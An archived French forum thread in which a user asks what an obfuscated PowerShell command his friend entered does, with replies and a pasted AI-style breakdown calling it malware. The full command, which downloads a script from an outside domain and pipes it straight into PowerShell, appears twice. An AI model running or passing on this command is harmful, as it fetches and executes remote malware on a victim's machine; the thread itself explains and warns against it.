Topic de OverNightShade :

Un pote s'est potentiellement fait hack en entrant une commande powershell sans se rendre compte

Supprimé
La commande "ÂČpoWErSHEll -W Mi"n"i"m"i"zed" cURL.eXE -k -L --"re"try 9"9"9 -"s"Sl -A "XIU" http"s://"v"a"boz.icu"/4e85bc"cbce0e"426f8937a"a309"7"855622".txt | pow"e"rs"h"el"l" -; REM Guard: Answer the protector challenge. Ref: 1451635poWErSHEll -W Mi"n"i"m"i"zed" cURL.e" ATTENTION NE PAS UTILISER. Est-ce que quelqu'un comprend ce que ça fait ?
il a juste lancé un site internet de merde

Le 23 avril 2025 Ă  00:25:39 :
il a juste lancé un site internet de merde

C'est Ă  dire ?

il a curl (telecharger) un fichier txt sur l'url au milieu de ton bousin, je sais pas ce que fais toute la commande mais j'ai l'impression qu'elle te fait telecharger un fichier a la con en gros et peut etre l'execute deriere (sans certitude pour ca) demande a chatgpt j'ai la flemme moi
et c'est quoi cette syntaxe de chien avec des " partout il rend fou ton topic de pseudohacker
On te passe une commande Shell chelou le premier rĂ©flexe c’est de la lancer :rire: mĂ©ritĂ© le hack

Tu fais bien de demander **et de ne surtout pas exécuter** cette commande. Voici une analyse précise de ce qu'elle tente de faire :

---

      1. 🔍 **DĂ©composition et Explication**

```powershell
ÂČpoWErSHEll -W Mi"n"i"m"i"zed" cURL.eXE -k -L --"re"try 9"9"9 -"s"Sl -A "XIU" http"s://"v"a"boz.icu"/4e85bc"cbce0e"426f8937a"a309"7"855622".txt | pow"e"rs"h"el"l" -;
```

      1. # 1. **Obfuscation volontaire**

La commande est volontairement écrite de maniÚre bizarre (avec des guillemets insérés dans les mots comme `"p"o"w"e"r"s"h"e"l"l"`) pour **échapper aux filtres de sécurité** ou rendre la lecture humaine plus difficile.

      1. # 2. **Téléchargement avec `curl`**

```powershell
curl.exe -k -L --retry 999 -sSl -A "XIU" https://vaboz.icu/4e85bccbce0e426f8937aa3097855622.txt
```
- **`-k`** : ignore les erreurs SSL (certificats non valides).
- **`-L`** : suit les redirections.
- **`--retry 999`** : tente de réessayer indéfiniment (comportement abusif).
- **`-sSl`** : exécute en mode silencieux, mais affiche les erreurs importantes.
- **`-A "XIU"`** : change l’User-Agent, souvent utilisĂ© pour contourner des blocages.
- Cela télécharge un **fichier texte potentiellement malveillant** depuis un **site suspect (vaboz.icu)**.

      1. # 3. **Exécution du contenu avec PowerShell**

```powershell
| powershell -
```
Le `|` signifie : **le contenu du fichier tĂ©lĂ©chargĂ© est envoyĂ© directement Ă  PowerShell**, donc **exĂ©cutĂ© immĂ©diatement** sans ĂȘtre enregistrĂ©.

---

      1. ☠ **Ce que cela fait rĂ©ellement**

- **Télécharge un script potentiellement malveillant depuis un domaine inconnu**.
- **Exécute ce script immédiatement** sans te montrer ce qu'il contient.
- Comme tout se passe en tĂąche de fond (minimized), tu **ne vois rien**.

---

      1. đŸ›Ąïž **Conclusion**

Cette commande est :
- TrÚs probablement un **malware** (cheval de Troie, voleur de données, ransomware, etc.).
- Obfusquée pour **bypasser les antivirus et les yeux humains non avertis**.
- Issue d’un domaine qui n’est **clairement pas lĂ©gitime**.

    • ❗ Ne l’exĂ©cute jamais. Supprime tout fichier ou message qui la contient.**

Si tu l’as dĂ©jĂ  exĂ©cutĂ©e : **dĂ©connecte le PC d’Internet et consulte un expert en sĂ©curitĂ© informatique immĂ©diatement.**

---

Tu veux que je t’aide Ă  analyser le lien ou le fichier qu’elle tĂ©lĂ©chargeait (sans l’exĂ©cuter) ?

flemme d'aller sur mon mac pour voir le contenue du txt, si ton pote peut ouvrir le txt a la main et donner le contenu du script on pourra t'en dire un peu plus sur quel connerie il a choppé

Le 23 avril 2025 Ă  00:37:21 :
flemme d'aller sur mon mac pour voir le contenue du txt, si ton pote peut ouvrir le txt a la main et donner le contenu du script on pourra t'en dire un peu plus sur quel connerie il a choppé

Comment il peut trouver le txt ?

il click sur le lien de l'url qui fini en .txt et la plusieurs scenario
1 : ca lu itelecharge le fichier et il l'ouvre dans son pc dans un bloc note ou quoi et nous donne le contenue
2 : ca ouvre le contenue du fichier dans une page de son navigateur et il a juste a copier coller
3 : ca fait des trucs obscure mais tfacon si il a deja lancé le script dans son terminal il est deja finito

Données du topic

Auteur
OverNightShade
Date de création
23 avril 2025 Ă  00:22:22
Date de suppression
26 avril 2025 Ă  21:48:00
Supprimé par
Auteur
Nb. messages archivés
13
Nb. messages JVC
13
Voir le topic sur JVC

Afficher uniquement les messages de l'auteur du topic

En ligne sur JvArchive
JvArchive compagnon
Découvrez JvArchive compagnon, l'userscript combattant la censure abusive sur le 18-25 !